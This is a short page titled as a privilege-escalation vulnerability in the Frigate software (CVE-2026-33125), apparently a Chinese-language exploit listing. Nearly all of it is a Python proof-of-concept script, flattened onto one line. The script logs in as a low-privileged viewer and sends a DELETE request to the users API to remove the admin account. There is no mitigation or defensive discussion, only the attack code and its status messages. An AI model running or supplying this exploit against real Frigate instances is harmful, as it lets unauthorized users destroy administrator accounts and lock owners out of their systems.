CVE-2026-33125 Frigate权限提升漏洞

import requests # Target configuration target_host = "http://192.168.1.100:5000" viewer_user = "viewer" viewer_pass = "password" admin_user_id = "1" # The ID of the admin account to delete def exploit(): session = requests.Session() # Step 1: Authenticate as a low-privileged viewer user print("[*] Attempting to login as viewer...") login_data = { "username": viewer_user, "password": viewer_pass } try: # Assuming standard login endpoint login_resp = session.post(f"{target_host}/api/token", data=login_data) if login_resp.status_code != 200: print("[-] Login failed.") return print("[+] Login successful.") # Step 2: Exploit Broken Access Control to delete Admin print(f"[*] Attempting to delete user ID {admin_user_id}...") # The vulnerability allows the viewer role to access the deletion endpoint delete_url = f"{target_host}/api/users/{admin_user_id}" delete_resp = session.delete(delete_url) if delete_resp.status_code in [200, 204]: print(f"[+] Successfully deleted user ID {admin_user_id}. Admin account removed.") else: print(f"[-] Exploit failed. Server responded with: {delete_resp.status_code}") print(delete_resp.text) except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": exploit()